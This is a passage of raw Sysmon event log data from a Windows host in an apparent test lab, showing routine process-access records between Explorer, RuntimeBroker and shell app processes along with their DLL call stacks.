System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000007073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF4DE3872158647D89FC1269C753F9CD,SHA256=4F0B431B36A8A711C8AB73ACDE9BBC48F9FF9D8CE35088A6D532C765B0EC5E6B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000007069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.679{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.679{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.679{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.679{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 